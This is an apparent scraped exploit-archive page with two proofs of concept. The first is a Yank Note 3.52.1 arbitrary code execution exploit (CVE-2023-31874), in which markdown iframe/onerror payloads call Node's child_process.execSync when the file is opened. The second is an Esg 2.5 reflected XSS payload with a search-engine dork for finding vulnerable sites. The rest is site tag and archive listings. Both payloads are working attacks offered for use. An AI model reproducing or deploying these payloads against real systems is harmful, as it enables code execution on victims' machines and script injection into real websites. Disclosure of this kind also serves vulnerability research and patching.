    # Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution# Date: 2023-04-27# Exploit Author: 8bitsec# CVE: CVE-2023-31874# Vendor Homepage: yank-note.com# Software Link: https://github.com/purocean/yn# Version: 3.52.1# Tested on: [Ubuntu 22.04 | Mac OS 13]Release Date: 2023-04-27Product & Service Introduction: A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacementTechnical Details & Description:A vulnerability was discovered on Yank Note v3.52.1 allowing a user to execute arbitrary code by opening a specially crafted file.Proof of Concept (PoC):Arbitrary code execution:Create a markdown file (.md) in any text editor and write the following payload.Mac:<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>">Ubuntu:<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>">Opening the file in Yank Note will auto execute the Calculator application.

Yank Note 3.52.1 Arbitrary Code Execution

Esg version 2.5 suffers from a cross site scripting vulnerability.

**Esg 2.5 Cross Site Scripting**

Posted May 24, 2023

Authored by indoushka

Esg version 2.5 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | af04171eca15deed52f8552f83c674dd50fbac0bfc4810eb316c96bde1b17488

Download | Favorite | View

**Esg 2.5 Cross Site Scripting**

    ===========================================================================================| # Title     : Esg 2.5 XSS Vulnerability                                                 || # Author    : indoushka                                                                 || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | | # Vendor    : https://www.creatop.com.tw/esg                                            |  | # Dork      : Powered by CREATOP                                                        |===========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>[+] http://www.127.0.0.1/vitaltec.com.tw/en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>Greetings to :===================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|=================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,187)
*   Arbitrary (16,018)
*   BBS (2,859)
*   Bypass (1,690)
*   CGI (1,024)
*   Code Execution (7,128)
*   Conference (677)
*   Cracker (841)
*   CSRF (3,315)
*   DoS (23,129)
*   Encryption (2,360)
*   Exploit (51,088)
*   File Inclusion (4,193)
*   File Upload (952)
*   Firewall (821)
*   Info Disclosure (2,712)
*   Intrusion Detection (883)
*   Java (2,998)
*   JavaScript (838)
*   Kernel (6,550)
*   Local (14,376)
*   Magazine (586)
*   Overflow (12,597)
*   Perl (1,421)
*   PHP (5,123)
*   Proof of Concept (2,302)
*   Protocol (3,559)
*   Python (1,499)
*   Remote (30,474)
*   Root (3,552)
*   Rootkit (505)
*   Ruby (607)
*   Scanner (1,633)
*   Security Tool (7,845)
*   Shell (3,159)
*   Shellcode (1,211)
*   Sniffer (892)
*   Spoof (2,189)
*   SQL Injection (16,219)
*   TCP (2,394)
*   Trojan (687)
*   UDP (883)
*   Virus (664)
*   Vulnerability (31,548)
*   Web (9,548)
*   Whitepaper (3,742)
*   x86 (958)
*   XSS (17,668)
*   Other

**File Archives**

*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,970)
*   BSD (372)
*   CentOS (57)
*   Cisco (1,920)
*   Debian (6,746)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,312)
*   HPUX (879)
*   iOS (342)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,712)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,293)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,597)
*   UNIX (9,230)
*   UnixWare (186)
*   Windows (6,554)
*   Other

Tag

#mac